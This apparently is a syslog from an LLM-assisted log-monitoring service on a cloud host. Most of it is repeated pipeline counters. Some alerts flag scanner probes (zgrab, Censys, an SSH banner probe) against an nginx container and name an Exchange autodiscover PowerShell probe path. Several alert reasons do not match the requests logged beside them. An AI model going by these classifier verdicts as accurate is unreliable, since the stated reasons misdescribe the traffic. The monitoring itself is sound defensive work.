Mar 20 15:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:51:01.955131 [observer] Pipeline: processed=7508 pattern_hits=6808 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:51:01.955204 [observer] Patterns: hash=6794 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:51:31.949486 [observer] Pipeline: processed=7510 pattern_hits=6810 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:51:31.949513 [observer] Patterns: hash=6796 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:52:01.997091 [observer] Pipeline: processed=7514 pattern_hits=6814 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:52:01.997124 [observer] Patterns: hash=6800 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:52:31.946179 [observer] Pipeline: processed=7516 pattern_hits=6816 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:52:31.946208 [observer] Patterns: hash=6802 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:53:01.990512 [observer] Pipeline: processed=7518 pattern_hits=6818 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:53:01.990551 [observer] Patterns: hash=6804 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:53:31.945322 [observer] Pipeline: processed=7522 pattern_hits=6822 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:53:31.945351 [observer] Patterns: hash=6808 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:54:01.956793 [observer] Pipeline: processed=7524 pattern_hits=6824 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:54:01.956847 [observer] Patterns: hash=6810 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:54:31.938321 [observer] Pipeline: processed=7530 pattern_hits=6830 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:54:31.938345 [observer] Patterns: hash=6816 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:55:02.106378 [observer] Pipeline: processed=7532 pattern_hits=6832 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:55:02.106406 [observer] Patterns: hash=6818 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:55:31.938693 [observer] Pipeline: processed=7536 pattern_hits=6836 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:55:31.938719 [observer] Patterns: hash=6822 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:56:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:56:02.008713 [observer] Pipeline: processed=7538 pattern_hits=6838 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:56:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:56:02.008998 [observer] Patterns: hash=6824 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:56:31.946793 [observer] Pipeline: processed=7540 pattern_hits=6840 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:56:31.946827 [observer] Patterns: hash=6826 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:57:01.964696 [observer] Pipeline: processed=7544 pattern_hits=6844 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:57:01.965383 [observer] Patterns: hash=6830 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:57:31.954851 [observer] Pipeline: processed=7546 pattern_hits=6846 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:57:31.954882 [observer] Patterns: hash=6832 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:58:01.956368 [observer] Pipeline: processed=7550 pattern_hits=6850 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:58:01.956396 [observer] Patterns: hash=6836 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:58:31.944099 [observer] Pipeline: processed=7552 pattern_hits=6852 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:58:31.944135 [observer] Patterns: hash=6838 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:59:01.959279 [observer] Pipeline: processed=7556 pattern_hits=6856 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:59:01.959310 [observer] Patterns: hash=6842 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:59:31.940784 [observer] Pipeline: processed=7560 pattern_hits=6860 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:59:31.940808 [observer] Patterns: hash=6846 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 16:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:00:01.986230 [observer] Pipeline: processed=7562 pattern_hits=6862 llm_calls=700 llm_errors=4 learned=8
Mar 20 16:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:00:01.986296 [observer] Patterns: hash=6848 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 16:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:00:31.939880 [observer] Pipeline: processed=7566 pattern_hits=6866 llm_calls=700 llm_errors=4 learned=8
Mar 20 16:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:00:31.939916 [observer] Patterns: hash=6852 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 16:01:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:01:02.056712 [observer] Pipeline: processed=7568 pattern_hits=6868 llm_calls=700 llm_errors=4 learned=8
Mar 20 16:01:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:01:02.056737 [observer] Patterns: hash=6854 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 16:01:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:01:07.501110 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 20 16:01:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:01:07.501151 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 16:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:01:31.940701 [observer] Pipeline: processed=7574 pattern_hits=6873 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:01:31.940736 [observer] Patterns: hash=6859 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:02:01.992983 [observer] Pipeline: processed=7576 pattern_hits=6875 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:02:01.993018 [observer] Patterns: hash=6861 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:02:31.938762 [observer] Pipeline: processed=7580 pattern_hits=6879 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:02:31.938790 [observer] Patterns: hash=6865 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:03:01.955210 [observer] Pipeline: processed=7582 pattern_hits=6881 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:03:01.957024 [observer] Patterns: hash=6867 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:03:31.948831 [observer] Pipeline: processed=7585 pattern_hits=6884 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:03:31.948857 [observer] Patterns: hash=6870 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:04:01.963784 [observer] Pipeline: processed=7589 pattern_hits=6888 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:04:01.963810 [observer] Patterns: hash=6874 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:04:31.946654 [observer] Pipeline: processed=7591 pattern_hits=6890 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:04:31.946684 [observer] Patterns: hash=6876 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:05:01.964081 [observer] Pipeline: processed=7597 pattern_hits=6896 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:05:01.964120 [observer] Patterns: hash=6882 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:05:31.946989 [observer] Pipeline: processed=7599 pattern_hits=6898 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:05:31.947022 [observer] Patterns: hash=6884 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:06:01.942837 [observer] Pipeline: processed=7603 pattern_hits=6902 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:06:01.942866 [observer] Patterns: hash=6888 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:06:31.948381 [observer] Pipeline: processed=7605 pattern_hits=6904 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:06:31.948484 [observer] Patterns: hash=6890 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:07:01.990240 [observer] Pipeline: processed=7607 pattern_hits=6906 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:07:01.990292 [observer] Patterns: hash=6892 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:07:31.943449 [observer] Pipeline: processed=7611 pattern_hits=6910 llm_calls=701 llm_errors=4 learned=8
Mar 20 16:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:07:31.943477 [observer] Patterns: hash=6896 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=701
Mar 20 16:07:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:07:41.171095 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 16:07:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:07:41.171154 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 16:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:08:02.057121 [observer] Pipeline: processed=7614 pattern_hits=6912 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:08:02.057180 [observer] Patterns: hash=6898 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:08:31.938390 [observer] Pipeline: processed=7619 pattern_hits=6917 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:08:31.938414 [observer] Patterns: hash=6903 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:09:01.967279 [observer] Pipeline: processed=7621 pattern_hits=6919 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:09:01.967544 [observer] Patterns: hash=6905 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:09:31.942626 [observer] Pipeline: processed=7625 pattern_hits=6923 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:09:31.942661 [observer] Patterns: hash=6909 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:10:01.967866 [observer] Pipeline: processed=7629 pattern_hits=6927 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:10:01.967893 [observer] Patterns: hash=6913 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:10:31.953891 [observer] Pipeline: processed=7631 pattern_hits=6929 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:10:31.953916 [observer] Patterns: hash=6915 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:11:01.971610 [observer] Pipeline: processed=7635 pattern_hits=6933 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:11:01.971642 [observer] Patterns: hash=6919 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:11:31.940003 [observer] Pipeline: processed=7637 pattern_hits=6935 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:11:31.940036 [observer] Patterns: hash=6921 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:12:01.981609 [observer] Pipeline: processed=7641 pattern_hits=6939 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:12:01.981722 [observer] Patterns: hash=6925 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:12:31.948880 [observer] Pipeline: processed=7643 pattern_hits=6941 llm_calls=702 llm_errors=4 learned=8
Mar 20 16:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:12:31.948907 [observer] Patterns: hash=6927 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=702
Mar 20 16:12:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:12:52.757316 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 16:12:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:12:52.757360 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on GET / with a user agent pointing to a scanning domain; multiple potential indicators of automated scanning Line=2026-03-20T16:12:43.399178526Z 3.131.220.121 - - [20/Mar/2026:16:12:43 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 650 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/...
Mar 20 16:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:13:01.981659 [observer] Pipeline: processed=7648 pattern_hits=6945 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:13:01.982561 [observer] Patterns: hash=6931 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=703
Mar 20 16:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:13:31.941612 [observer] Pipeline: processed=7650 pattern_hits=6947 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:13:31.941642 [observer] Patterns: hash=6933 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=703
Mar 20 16:13:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:13:52.468251 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on GET / with a user agent pointing to a scanning domain; multiple potential indicators of automated scanning Line=2026-03-20T16:13:52.467945658Z 3.131.220.121 - - [20/Mar/2026:16:13:52 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 650 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/...
Mar 20 16:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:14:01.957612 [observer] Pipeline: processed=7653 pattern_hits=6950 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:14:01.957639 [observer] Patterns: hash=6936 prefix=14 regex=0 contains=0 deny=134 alert=855 suppress=0 misses=703
Mar 20 16:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:14:31.938850 [observer] Pipeline: processed=7657 pattern_hits=6954 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:14:31.938876 [observer] Patterns: hash=6940 prefix=14 regex=0 contains=0 deny=134 alert=855 suppress=0 misses=703
Mar 20 16:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:15:01.963121 [observer] Pipeline: processed=7661 pattern_hits=6958 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:15:01.963154 [observer] Patterns: hash=6944 prefix=14 regex=0 contains=0 deny=134 alert=855 suppress=0 misses=703
Mar 20 16:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:15:31.938705 [observer] Pipeline: processed=7666 pattern_hits=6963 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:15:31.938729 [observer] Patterns: hash=6949 prefix=14 regex=0 contains=0 deny=134 alert=855 suppress=0 misses=703
Mar 20 16:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:16:01.951994 [observer] Pipeline: processed=7668 pattern_hits=6965 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:16:01.952029 [observer] Patterns: hash=6951 prefix=14 regex=0 contains=0 deny=134 alert=855 suppress=0 misses=703
Mar 20 16:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:16:31.940825 [observer] Pipeline: processed=7672 pattern_hits=6969 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:16:31.940859 [observer] Patterns: hash=6955 prefix=14 regex=0 contains=0 deny=134 alert=855 suppress=0 misses=703
Mar 20 16:16:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:16:42.675622 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T16:16:42.675346876Z 3.131.220.121 - - [20/Mar/2026:16:16:42 +0000] "_" "SSH-2.0-Go" 400 150 "-" "-" "-"
Mar 20 16:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:17:01.974567 [observer] Pipeline: processed=7675 pattern_hits=6972 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:17:01.974600 [observer] Patterns: hash=6958 prefix=14 regex=0 contains=0 deny=134 alert=856 suppress=0 misses=703
Mar 20 16:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:17:31.949532 [observer] Pipeline: processed=7677 pattern_hits=6974 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:17:31.949560 [observer] Patterns: hash=6960 prefix=14 regex=0 contains=0 deny=134 alert=856 suppress=0 misses=703
Mar 20 16:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:18:01.961233 [observer] Pipeline: processed=7681 pattern_hits=6978 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:18:01.961325 [observer] Patterns: hash=6964 prefix=14 regex=0 contains=0 deny=134 alert=856 suppress=0 misses=703
Mar 20 16:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:18:31.949335 [observer] Pipeline: processed=7683 pattern_hits=6980 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:18:31.949362 [observer] Patterns: hash=6966 prefix=14 regex=0 contains=0 deny=134 alert=856 suppress=0 misses=703
Mar 20 16:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:19:01.950959 [observer] Pipeline: processed=7687 pattern_hits=6984 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:19:01.950985 [observer] Patterns: hash=6970 prefix=14 regex=0 contains=0 deny=134 alert=856 suppress=0 misses=703
Mar 20 16:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:19:31.940967 [observer] Pipeline: processed=7689 pattern_hits=6986 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:19:31.940999 [observer] Patterns: hash=6972 prefix=14 regex=0 contains=0 deny=134 alert=856 suppress=0 misses=703
Mar 20 16:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:01.966829 [observer] Pipeline: processed=7695 pattern_hits=6992 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:01.966891 [observer] Patterns: hash=6978 prefix=14 regex=0 contains=0 deny=134 alert=856 suppress=0 misses=703
Mar 20 16:20:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:22.786066 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T16:20:22.785908466Z 167.99.93.212 - - [20/Mar/2026:16:20:22 +0000] "54.200.221.0" "GET /aaa9 HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 16:20:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:23.129833 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T16:20:23.129670072Z 167.99.93.212 - - [20/Mar/2026:16:20:23 +0000] "54.200.221.0" "GET /aab8 HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 16:20:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:29.621555 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T16:20:29.621253311Z 66.132.172.196 - - [20/Mar/2026:16:20:29 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censy...
Mar 20 16:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:31.941406 [observer] Pipeline: processed=7705 pattern_hits=7002 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:31.941448 [observer] Patterns: hash=6986 prefix=16 regex=0 contains=0 deny=137 alert=856 suppress=0 misses=703
Mar 20 16:20:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:20:40.370323 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T16:20:40.370080588Z 66.132.172.196 - - [20/Mar/2026:16:20:40 +0000] "54.200.221.0" "GET /wiki HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"...
Mar 20 16:21:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:21:00.722570 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an HTTP 400 response with an empty/requestless line and placeholder values in the normalized form, indicating a potential anomalous access attempt. Line=2026-03-20T16:21:00.722320962Z 3.131.220.121 - - [20/Mar/2026:16:21:00 +0000] "_" "" 400 0 "-" "-" "-"
Mar 20 16:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:21:01.953707 [observer] Pipeline: processed=7710 pattern_hits=7007 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:21:01.953735 [observer] Patterns: hash=6990 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:21:31.943116 [observer] Pipeline: processed=7714 pattern_hits=7011 llm_calls=703 llm_errors=4 learned=8
Mar 20 16:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:21:31.943146 [observer] Patterns: hash=6994 prefix=17 regex=0 contains=0 deny=138 alert=857 suppress=0 misses=703
Mar 20 16:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 16:22:01.949136 [observer] Pipeline: processed=7716 pattern_hits=7013 llm_calls=703 llm_errors=4 learned=8
